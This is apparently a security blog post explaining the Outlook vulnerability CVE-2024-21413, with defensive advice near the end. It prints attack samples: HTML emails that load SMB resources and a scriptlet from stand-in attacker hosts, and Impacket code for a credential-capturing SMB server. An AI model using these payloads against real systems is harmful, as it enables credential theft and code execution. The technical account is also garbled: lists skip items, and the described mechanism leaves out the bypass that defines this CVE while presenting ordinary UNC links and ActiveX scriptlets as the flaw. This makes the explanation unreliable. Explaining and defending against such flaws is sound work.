CVE-2024-21413 - Breaking Down the New Microsoft Outlook Remote Code Execution Vulnerability

---

In early 2024, a major security flaw was uncovered in Microsoft Outlook, tagged as CVE-2024-21413. This vulnerability makes it possible for hackers to execute code on your computer – simply if you receive a specially crafted email. In this exclusive post, we’ll unpack how the flaw works, what the risks are, how the exploit really looks in code, and what you can do right now to stay safe.

What Exactly is CVE-2024-21413?

CVE-2024-21413 is a Remote Code Execution (RCE) vulnerability affecting Microsoft Outlook on Windows. If an attacker sends you a malicious email and you preview or open it, the attacker’s code could run on your computer. This happens without needing to click weird attachments or links– just previewing the email can be enough!

Outlook for Microsoft 365

*For full details, check the official Microsoft advisory here: Microsoft Security Guide*

How Does the Exploit Work?

This vulnerability arises because Outlook improperly handles certain malicious links inside emails. By crafting a special type of *UNC path* (a kind of network path in Windows), attackers can trick Outlook into opening a dangerous file or triggering a payload– even from the preview pane.

Usually, Microsoft Outlook blocks dangerous links that might point to malicious networking locations. But in this case, it does not block special URL schemes properly. This allows WebDAV or SMB requests to your internal resources, leaking NTLM hashes, or worse, downloading and running malicious scripts.

\\malicious-attacker.com\share\evil.html

2. Email is delivered: You don’t even need to click anything– just viewing it in the preview pane is enough.

3. Code executed: Outlook tries to fetch the resource, and depending on the payload, code runs on your machine.

Here’s a basic snippet of how the malicious link might be embedded in the HTML email

<html>
<body>
<!-- Image loads from attacker's SMB server -->
<img src="\\attacker-server\share\payload.png" />
</body>
</html>

If someone previews this message in Outlook, it attempts to access the attacker's SMB share, possibly giving away Windows credentials or running additional code.

Attackers can use an htmlfile or scriptlet scheme to execute scripts

<html>
<body>
<!-- ActiveX used to run script without user consent -->
<object data="\\attacker.com\file.sct" type="text/x-scriptlet"></object>
</body>
</html>

Or using a file:// reference if local access is needed.

Exploit in Python (For Demonstration Only)

Attackers can capture credentials using a basic SMB server like Impacket’s smbserver.py:

from impacket import smbserver

def start_smb_server():
    server = smbserver.SimpleSMBServer(listenAddress='...', listenPort=445)
    server.addShare('SHARE', '/tmp/payload', '')
    server.start()

if __name__ == "__main__":
    start_smb_server()

*When the target Outlook client loads the malicious email, it connects to this server and offers up Windows credentials automatically.*

Bypasses Previous Protections: Outlook’s usual filters can be bypassed with this trick.

- Could Lead to Further Attacks: Exposed credentials or code execution let an attacker roam your network.

Patch Outlook Immediately: Microsoft released a fix in the February 2024 Patch Tuesday update.

Direct patch instructions here

Disable automatic image loading: Set Outlook to not automatically download pictures or files.

3. Block outgoing SMB traffic: Preventing SMB traffic to the internet from workstations is a good safety measure.
4. Monitor for suspicious activity: Watch your logs for odd SMB or WebDAV requests to external servers.
5. Educate users: Let your team know not to open suspicious emails– though this exploit can act even without that step.

References for Deep Dive

- Microsoft Official CVE Advisory
- Huntress Labs blog breakdown
- ZDI’s Zero Day Initiative write-up

For technical readers, a detailed discussion thread can be found here:
Reddit NetSec Thread

The Takeaway

CVE-2024-21413 is a stark reminder that even trusted software like Outlook can have critical vulnerabilities. Stay ahead by patching fast, updating security policies, and keeping your users alert.

If you’re a system admin, audit your organization now. If you’re an everyday Outlook user, update your app ASAP and don’t ever ignore those “Update Available” reminders. In cybersecurity, the simplest steps often make the biggest difference.

Timeline

Published on: 02/13/2024 18:16:00 UTC
Last modified on: 02/15/2024 04:15:07 UTC